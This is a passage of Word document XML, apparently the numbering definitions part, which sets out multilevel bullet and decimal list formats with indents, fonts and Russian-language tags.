      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D2DA9660">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="70501210">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6CFA3E68">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="84" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E3F5586"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8178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5818F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E902A9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1280BE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000000E"/>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87" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="31C21A7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D24D9FE"/>
    <w:lvl w:ilvl="0" w:tplc="8A06949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321931D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="906A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34A64B3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E3605680"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="11"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="380"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="90" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34BF4037"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2F4532A"/>
    <w:lvl w:ilvl="0" w:tplc="DA5C9FA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Mt----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5327207"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7B0DAC8"/>
    <w:lvl w:ilvl="0" w:tplc="A9107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35C46FB5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D10C3B4"/>
    <w:lvl w:ilvl="0" w:tplc="61B6EEE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Mt--"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BD9CBE44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BD9CBE44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="18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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="36AA504F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65502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6D373D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AADEA7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378D526B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D801948"/>
    <w:lvl w:ilvl="0" w:tplc="05CC9C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87F102E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BA2B772"/>
    <w:lvl w:ilvl="0" w:tplc="7F729CE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94545B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAFA1548"/>
    <w:lvl w:ilvl="0" w:tplc="EBBC42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9F954A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B400288"/>
    <w:lvl w:ilvl="0" w:tplc="60342B96">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-8"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="70BEC3EA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5D32D3CE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FF5AEEEC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9DDC98D6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CAFCA560">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F9B2AE98">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="70D03964">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2D3EFE88">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="99" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B5456E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07AEEE46"/>
    <w:lvl w:ilvl="0" w:tplc="8D50D678">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="809"/>
        </w:tabs>
        <w:ind w:left="809" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="376A30DA">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="99AE317A">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="73586630">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DE644BAE">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D9C88224">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3C0621AC">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="12188116">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AC8C1D64">
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="100" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B916172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B0AFB74"/>
    <w:lvl w:ilvl="0" w:tplc="24B2159A">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3C6065FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B7601FC"/>
    <w:lvl w:ilvl="0" w:tplc="34342A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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3D925DE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6450E1A0"/>
    <w:lvl w:ilvl="0" w:tplc="6DBEB536">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Mt----2"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E190620"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64662030"/>
    <w:lvl w:ilvl="0" w:tplc="2D86C71C">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3E5324B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9E02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F6F54E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21923B1A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="797"/>
        </w:tabs>
        <w:ind w:left="797" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1594"/>
        </w:tabs>
        <w:ind w:left="1594" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2031"/>
        </w:tabs>
        <w:ind w:left="2031" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2828"/>
        </w:tabs>
        <w:ind w:left="2828" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3265"/>
        </w:tabs>
        <w:ind w:left="3265" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4062"/>
        </w:tabs>
        <w:ind w:left="4062" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4499"/>
        </w:tabs>
        <w:ind w:left="4499" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5296"/>
        </w:tabs>
        <w:ind w:left="5296" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="106" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42307C64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A612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2CD7C1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B76F850"/>
    <w:lvl w:ilvl="0" w:tplc="A4840DA4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="−"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="413" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BC348A46">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1307" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3D8A2578">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2382" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B72CC4F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3465" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="507AF07E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4548" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A4A0192A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5631" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AE3CE128">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6714" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5E0EC9FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7797" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0F5208BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8879" w:hanging="233"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="108" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="435142B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C3AF218"/>
    <w:lvl w:ilvl="0" w:tplc="40B48F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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="444B41F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7048492"/>
    <w:lvl w:ilvl="0" w:tplc="4C003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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="44C80013"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14B832B6"/>
    <w:lvl w:ilvl="0" w:tplc="8A06949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5603C03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4ECD780"/>
    <w:lvl w:ilvl="0" w:tplc="DCC89F7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1191"/>
        </w:tabs>
        <w:ind w:left="1191" w:hanging="7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5BE570B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCEA3D2C"/>
    <w:lvl w:ilvl="0" w:tplc="3528CA5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="467" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="29"/>
        <w:szCs w:val="29"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6EE00B98">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="869" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="19704240">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1279" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="036EE724">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1689" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0EE6035A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2098" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0B24DB9E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2508" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D5884826">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2918" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="35EABEB6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3327" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0220EBFE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3737" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="113" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45CB4A9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72FEF2EA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2400" w:hanging="108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720" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4560" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6720" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="114" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="490A3FDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F80086C"/>
    <w:lvl w:ilvl="0" w:tplc="7CB467F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
